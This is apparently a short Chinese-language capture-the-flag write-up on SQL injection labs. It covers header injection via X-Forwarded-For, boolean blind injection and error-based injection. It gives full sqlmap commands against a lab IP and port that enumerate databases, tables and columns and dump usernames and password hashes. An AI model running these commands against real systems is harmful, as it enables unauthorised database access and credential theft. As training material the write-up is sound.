1、注入漏洞实战
burpsuite抓包 添加X-Forwarded-For:* 保存为.txt文件,放到sqlmap文件中 然后python sqlmap.py -r sql.txt --dbs -batch** 得到用户名和密码,登录得到flag2、布尔盲注
点开下面的通知,存在注入点
sqlmap.py -u http://219.153.49.228:49885/new_list.php?id=1 --current-dbB爆数据库
sqlmap.py -u http://219.153.49.228:49885/new_list.php?id=1 -D stormgroup --tables爆表
sqlmap.py -u http://219.153.49.228:49885/new_list.php?id=1 -D stormgroup -T member --columns爆字段
sqlmap.py -u http://219.153.49.228:49885/new_list.php?id=1 -D stormgroup -T member -C name,password --dump爆用户名和密码
密码需要md5解码,然后登录得到flag3、报错盲注
与上题解题思路一样